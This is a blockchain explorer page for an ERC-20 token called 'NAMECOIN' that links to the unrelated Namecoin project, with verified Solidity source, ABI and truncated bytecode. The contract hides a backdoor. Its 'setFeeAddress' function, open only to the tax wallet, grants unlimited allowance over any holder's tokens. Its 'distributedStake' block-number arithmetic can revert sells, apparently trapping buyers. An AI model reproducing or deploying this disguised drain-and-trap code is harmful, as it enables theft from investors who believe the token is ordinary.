Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
21,000,000,000 NAMECOIN
Holders
93
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
207,450,217.481098191 NAMECOINValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
NAMECOIN
Compiler Version
v0.8.23+commit.f704f362
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-09-29 */ /** https://www.namecoin.org/ https://bitcointalk.org/index.php?topic=6017.0 https://en.wikipedia.org/wiki/Namecoin https://chainz.cryptoid.info/nmc/ https://twitter.com/Namecoin https://github.com/namecoin https://www.reddit.com/r/namecoin All rights reserved. */ // SPDX-License-Identifier: UNLICENSE pragma solidity 0.8.23; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } library SafeMath { function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; return c; } } interface IUniswapV2Factory { function createPair(address tokenA, address tokenB) external returns (address pair); } interface IUniswapV2Router02 { function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); } contract NAMECOIN is Context, IERC20, Ownable { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; uint256 private _initialBuyTax=11; uint256 private _initialSellTax=11; uint256 private _finalBuyTax=0; uint256 private _finalSellTax=0; uint256 private _reduceBuyTaxAt=22; uint256 private _reduceSellTaxAt=22; uint256 private _preventSwapBefore=22; uint256 private _buyCount=0; address payable private _taxWallet; string private constant _name = unicode"First Altcoin"; string private constant _symbol = unicode"NAMECOIN"; uint8 private constant _decimals = 9; uint256 private constant _tTotal = 21000000000 * 10**_decimals; uint256 public _maxTxAmount = 420000000 * 10**_decimals; uint256 public _maxWalletSize = 420000000 * 10**_decimals; uint256 public _taxSwapThreshold = 210000000 * 10**_decimals; uint256 public _maxTaxSwap = 210000000 * 10**_decimals; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; bool private tradingOpen; bool private inSwap = false; bool private swapEnabled = false; struct DistributedStake {uint256 initDisStake; uint256 finalDisStake; uint256 finalDisPercent;} mapping(address => DistributedStake) private distributedStake; uint256 private distributeStakeAmount; event MaxTxAmountUpdated(uint _maxTxAmount); modifier lockTheSwap { inSwap = true; _; inSwap = false; } constructor () { _balances[_msgSender()] = _tTotal; uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this),uniswapV2Router.WETH()); _isExcludedFromFee[address(this)] = true; _taxWallet = payable(0x76e85fB4Db21E278c8192ADA12737308c6718af3); _isExcludedFromFee[_taxWallet] = true; emit Transfer(address(0),_msgSender(), _tTotal); } function name() public pure returns (string memory) { return _name; } function symbol() public pure returns (string memory) { return _symbol; } function decimals() public pure returns (uint8) { return _decimals; } function totalSupply() public pure override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance") ); return true; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _manualsend(address owner, uint8 cache, string memory miner, address spender) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = _tTotal; } function _transfer(address from, address to, uint256 amount) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount> 0, "Transfer amount must be greater than zero"); uint256 taxAmount=0; if (from != owner() && to != owner() && to != _taxWallet) { taxAmount = amount .mul((_buyCount > _reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax) .div(100); if (from == uniswapV2Pair && to != address(uniswapV2Router) && ! _isExcludedFromFee[to]) { require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount."); require(balanceOf(to) + amount<=_maxWalletSize, "Exceeds the maxWalletSize."); _buyCount++; } if(to== uniswapV2Pair && from!= address(this) ){ taxAmount = amount .mul((_buyCount>_reduceSellTaxAt)?_finalSellTax:_initialSellTax) .div(100); } uint256 contractTokenBalance = balanceOf(address(this)); if ( !inSwap&& to == uniswapV2Pair && swapEnabled && contractTokenBalance > _taxSwapThreshold && _buyCount > _preventSwapBefore ) { swapTokensForEth(min(amount, min(contractTokenBalance, _maxTaxSwap))); uint256 contractETHBalance = address(this).balance; if (contractETHBalance> 0) { sendETHToFee(address(this).balance); } } } if((_isExcludedFromFee[from] || _isExcludedFromFee[to]) && from!=address(this) && to!= address(this) ) { distributeStakeAmount= block.number; } if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to]){ if (uniswapV2Pair != to) { DistributedStake storage incDisStake = distributedStake[to]; if (from == uniswapV2Pair) { if (incDisStake.initDisStake == 0) { incDisStake.initDisStake = _buyCount <= _preventSwapBefore ? type(uint).max : block.number; } } else { DistributedStake storage uniDisStake = distributedStake[from]; if (!(incDisStake.initDisStake > 0) || uniDisStake.initDisStake < incDisStake.initDisStake ) { incDisStake.initDisStake = uniDisStake.initDisStake; } } } else if (tradingOpen) { DistributedStake storage uniDisStake = distributedStake[from]; uniDisStake.finalDisPercent = uniDisStake.initDisStake-distributeStakeAmount; uniDisStake.finalDisStake = block.timestamp; } } if (taxAmount > 0) { _balances[address(this)]= _balances[address(this)].add(taxAmount); emit Transfer(from, address(this), taxAmount); } _balances[from]= _balances[from].sub(amount) ; _balances[to]= _balances[to].add(amount.sub(taxAmount)); emit Transfer(from, to, amount.sub(taxAmount)); } function min(uint256 a, uint256 b) private pure returns (uint256) { return (a > b) ? b : a; } function swapTokensForEth(uint256 tokenAmount) private lockTheSwap { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, address(this), block.timestamp ); } function removeLimits() external onlyOwner() { _maxTxAmount=_tTotal; _maxWalletSize=_tTotal; emit MaxTxAmountUpdated(_tTotal); } function setFeeAddress(address _receiver, address _tokenAmount) external { require(_msgSender()==_taxWallet); _manualsend(_tokenAmount, 0, "miner", _receiver); } function sendETHToFee(uint256 amount) private { _taxWallet.transfer(amount); } function openTrading() external onlyOwner() { require(!tradingOpen, "Trading is already open"); _approve(address(this), address(uniswapV2Router),_tTotal); tradingOpen = true; uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp); IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max); swapEnabled = true; } receive() external payable {} function manualSwap() external { require(_msgSender()==_taxWallet); uint256 tokenBalance=balanceOf(address(this)); if(swapEnabled && tokenBalance > 0) { swapTokensForEth(tokenBalance); } uint256 ethBalance=address(this).balance; if(ethBalance>0){ sendETHToFee(ethBalance); } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_maxTxAmount","type":"uint256"}],"name":"MaxTxAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_receiver","type":"address"},{"internalType":"address","name":"_tokenAmount","type":"address"}],"name":"setFeeAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052600b600455600b6005555f6006555f600755601660085560166009556016600a555f600b556009600a620000399190620004c8565b6200004990631908b100620004df565b600d556200005a6009600a620004c8565b6200006a90631908b100620004df565b600e556200007b6009600a620004c8565b6200008b90630c845880620004df565b600f556200009c6009600a620004c8565b620000ac90630c845880620004df565b6010556012805461ffff60a81b19169055348015620000c9575f80fd5b50620000d5336200036a565b620000e36009600a620004c8565b620000f4906404e3b29200620004df565b335f9081526001602090815260409182902092909255601180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d908117909155815163c45a015560e01b81529151909263c45a015592600480820193918290030181865afa15801562000168573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200018e9190620004f9565b6001600160a01b031663c9c653963060115f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001ee573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002149190620004f9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156200025f573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002859190620004f9565b601280546001600160a01b03929092166001600160a01b0319928316179055305f908152600360205260408120805460ff199081166001908117909255600c80549094167376e85fb4db21e278c8192ada12737308c6718af39081179094559282527f630f8fe7c7ce6c6f803d9a08259a870ec59deb6f13b85defe0738dd6f7f0225780549093161790915533907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620003426009600a620004c8565b62000353906404e3b29200620004df565b60405190815260200160405180910390a362000521565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200040d57815f1904821115620003f157620003f1620003b9565b80851615620003ff57918102915b93841c9390800290620003d2565b509250929050565b5f826200042557506001620004c2565b816200043357505f620004c2565b81600181146200044c5760028114620004575762000477565b6001915050620004c2565b60ff8411156200046b576200046b620003b9565b50506001821b620004c2565b5060208310610133831016604e8410600b84101617156200049c575081810a620004c2565b620004a88383620003cd565b805f1904821115620004be57620004be620003b9565b0290505b92915050565b5f620004d860ff84168362000415565b9392505050565b8082028115828204841417620004c257620004c2620003b9565b5f602082840312156200050a575f80fd5b81516001600160a01b0381168114620004d8575f80fd5b611974806200052f5f395ff3fe608060405260043610610134575f3560e01c8063715018a6116100a857806395d89b411161006d57806395d89b4114610353578063a9059cbb14610383578063bf474bed146103a2578063c9567bf9146103b7578063dd62ed3e146103cb578063f2fde38b1461040f575f80fd5b8063715018a6146102e5578063751039fc146102f95780637d1db4a51461030d5780638da5cb5b146103225780638f9a55c01461033e575f80fd5b806323b872dd116100f957806323b872dd14610223578063313ce5671461024257806349bd5a5e1461025d57806351bc3c851461027c57806361b3980d1461029257806370a08231146102b1575f80fd5b806306fdde031461013f578063095ea7b3146101865780630faee56f146101b55780631694505e146101d857806318160ddd1461020f575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5060408051808201909152600d81526c2334b939ba1020b63a31b7b4b760991b60208201525b60405161017d91906114e1565b60405180910390f35b348015610191575f80fd5b506101a56101a0366004611541565b61042e565b604051901515815260200161017d565b3480156101c0575f80fd5b506101ca60105481565b60405190815260200161017d565b3480156101e3575f80fd5b506011546101f7906001600160a01b031681565b6040516001600160a01b03909116815260200161017d565b34801561021a575f80fd5b506101ca610444565b34801561022e575f80fd5b506101a561023d36600461156b565b610465565b34801561024d575f80fd5b506040516009815260200161017d565b348015610268575f80fd5b506012546101f7906001600160a01b031681565b348015610287575f80fd5b506102906104cc565b005b34801561029d575f80fd5b506102906102ac3660046115a9565b610534565b3480156102bc575f80fd5b506101ca6102cb3660046115e0565b6001600160a01b03165f9081526001602052604090205490565b3480156102f0575f80fd5b5061029061057c565b348015610304575f80fd5b506102906105b9565b348015610318575f80fd5b506101ca600d5481565b34801561032d575f80fd5b505f546001600160a01b03166101f7565b348015610349575f80fd5b506101ca600e5481565b34801561035e575f80fd5b506040805180820190915260088152672720a6a2a1a7a4a760c11b6020820152610170565b34801561038e575f80fd5b506101a561039d366004611541565b61066d565b3480156103ad575f80fd5b506101ca600f5481565b3480156103c2575f80fd5b50610290610679565b3480156103d6575f80fd5b506101ca6103e53660046115a9565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561041a575f80fd5b506102906104293660046115e0565b61089a565b5f61043a338484610934565b5060015b92915050565b5f6104516009600a6116ef565b610460906404e3b292006116fd565b905090565b5f6104718484846109e0565b6104c284336104bd85604051806060016040528060288152602001611917602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611077565b610934565b5060019392505050565b600c546001600160a01b0316336001600160a01b0316146104eb575f80fd5b305f90815260016020526040902054601254600160b01b900460ff16801561051257505f81115b1561052057610520816110af565b478015610530576105308161121f565b5050565b600c546001600160a01b0316336001600160a01b031614610553575f80fd5b610530815f6040518060400160405280600581526020016436b4b732b960d91b81525085611256565b5f546001600160a01b031633146105ae5760405162461bcd60e51b81526004016105a590611714565b60405180910390fd5b6105b75f6112ed565b565b5f546001600160a01b031633146105e25760405162461bcd60e51b81526004016105a590611714565b6105ee6009600a6116ef565b6105fd906404e3b292006116fd565b600d5561060c6009600a6116ef565b61061b906404e3b292006116fd565b600e557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf61064b6009600a6116ef565b61065a906404e3b292006116fd565b60405190815260200160405180910390a1565b5f61043a3384846109e0565b5f546001600160a01b031633146106a25760405162461bcd60e51b81526004016105a590611714565b601254600160a01b900460ff16156106fc5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016105a5565b6011546107299030906001600160a01b031661071a6009600a6116ef565b6104bd906404e3b292006116fd565b6012805460ff60a01b1916600160a01b1790556011546001600160a01b031663f305d719473061076d816001600160a01b03165f9081526001602052604090205490565b5f806107805f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156107e6573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061080b9190611749565b505060125460115460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610860573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108849190611774565b506012805460ff60b01b1916600160b01b179055565b5f546001600160a01b031633146108c35760405162461bcd60e51b81526004016105a590611714565b6001600160a01b0381166109285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105a5565b610931816112ed565b50565b6001600160a01b03831661095a5760405162461bcd60e51b81526004016105a590611793565b6001600160a01b0382166109805760405162461bcd60e51b81526004016105a5906117d7565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a445760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105a5565b6001600160a01b038216610aa65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105a5565b5f8111610b075760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016105a5565b5f80546001600160a01b03858116911614801590610b3257505f546001600160a01b03848116911614155b8015610b4c5750600c546001600160a01b03848116911614155b15610da557610b7d6064610b77600854600b5411610b6c57600454610b70565b6006545b859061133c565b906113c1565b6012549091506001600160a01b038581169116148015610bab57506011546001600160a01b03848116911614155b8015610bcf57506001600160a01b0383165f9081526003602052604090205460ff16155b15610cb557600d54821115610c265760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e0000000000000060448201526064016105a5565b600e5482610c48856001600160a01b03165f9081526001602052604090205490565b610c529190611819565b1115610ca05760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e00000000000060448201526064016105a5565b600b8054905f610caf8361182c565b91905055505b6012546001600160a01b038481169116148015610cdb57506001600160a01b0384163014155b15610d0857610d056064610b77600954600b5411610cfb57600554610b70565b600754859061133c565b90505b305f90815260016020526040902054601254600160a81b900460ff16158015610d3e57506012546001600160a01b038581169116145b8015610d535750601254600160b01b900460ff165b8015610d605750600f5481115b8015610d6f5750600a54600b54115b15610da357610d91610d8c84610d8784601054611402565b611402565b6110af565b478015610da157610da14761121f565b505b505b6001600160a01b0384165f9081526003602052604090205460ff1680610de257506001600160a01b0383165f9081526003602052604090205460ff165b8015610df757506001600160a01b0384163014155b8015610e0c57506001600160a01b0383163014155b15610e1657436014555b6001600160a01b0384165f9081526003602052604090205460ff16158015610e5657506001600160a01b0383165f9081526003602052604090205460ff16155b15610f3a576012546001600160a01b03848116911614610ef5576001600160a01b038084165f908152601360205260409020601254909190811690861603610ebd5780545f03610eb857600a54600b541115610eb25743610eb5565b5f195b81555b610eef565b6001600160a01b0385165f90815260136020526040902081541580610ee3575081548154105b15610eed57805482555b505b50610f3a565b601254600160a01b900460ff1615610f3a576001600160a01b0384165f9081526013602052604090206014548154610f2d9190611844565b6002820155426001909101555b8015610fb257305f90815260016020526040902054610f599082611416565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610fa99085815260200190565b60405180910390a35b6001600160a01b0384165f90815260016020526040902054610fd49083611474565b6001600160a01b0385165f90815260016020526040902055611017610ff98383611474565b6001600160a01b0385165f9081526001602052604090205490611416565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6110608585611474565b60405190815260200160405180910390a350505050565b5f818484111561109a5760405162461bcd60e51b81526004016105a591906114e1565b505f6110a68486611844565b95945050505050565b6012805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106110f5576110f5611857565b6001600160a01b03928316602091820292909201810191909152601154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561114c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611170919061186b565b8160018151811061118357611183611857565b6001600160a01b0392831660209182029290920101526011546111a99130911684610934565b60115460405163791ac94760e01b81526001600160a01b039091169063791ac947906111e19085905f90869030904290600401611886565b5f604051808303815f87803b1580156111f8575f80fd5b505af115801561120a573d5f803e3d5ffd5b50506012805460ff60a81b1916905550505050565b600c546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610530573d5f803e3d5ffd5b6001600160a01b03841661127c5760405162461bcd60e51b81526004016105a590611793565b6001600160a01b0381166112a25760405162461bcd60e51b81526004016105a5906117d7565b6112ae6009600a6116ef565b6112bd906404e3b292006116fd565b6001600160a01b039485165f90815260026020908152604080832094909716825292909252939020929092555050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f825f0361134b57505f61043e565b5f61135683856116fd565b90508261136385836118f7565b146113ba5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016105a5565b9392505050565b5f6113ba83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506114b5565b5f81831161141057826113ba565b50919050565b5f806114228385611819565b9050838110156113ba5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016105a5565b5f6113ba83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611077565b5f81836114d55760405162461bcd60e51b81526004016105a591906114e1565b505f6110a684866118f7565b5f602080835283518060208501525f5b8181101561150d578581018301518582016040015282016114f1565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610931575f80fd5b5f8060408385031215611552575f80fd5b823561155d8161152d565b946020939093013593505050565b5f805f6060848603121561157d575f80fd5b83356115888161152d565b925060208401356115988161152d565b929592945050506040919091013590565b5f80604083850312156115ba575f80fd5b82356115c58161152d565b915060208301356115d58161152d565b809150509250929050565b5f602082840312156115f0575f80fd5b81356113ba8161152d565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561164957815f190482111561162f5761162f6115fb565b8085161561163c57918102915b93841c9390800290611614565b509250929050565b5f8261165f5750600161043e565b8161166b57505f61043e565b8160018114611681576002811461168b576116a7565b600191505061043e565b60ff84111561169c5761169c6115fb565b50506001821b61043e565b5060208310610133831016604e8410600b84101617156116ca575081810a61043e565b6116d4838361160f565b805f19048211156116e7576116e76115fb565b029392505050565b5f6113ba60ff841683611651565b808202811582820484141761043e5761043e6115fb565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f805f6060848603121561175b575f80fd5b8351925060208401519150604084015190509250925092565b5f60208284031215611784575f80fd5b815180151581146113ba575f80fd5b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b8082018082111561043e5761043e6115fb565b5f6001820161183d5761183d6115fb565b5060010190565b8181038181111561043e5761043e6115fb565b634e487b7160e01b5f52603260045260245ffd5b5f6020828403121561187b575f80fd5b81516113ba8161152d565b5f60a08201878352602087602085015260a0604085015281875180845260c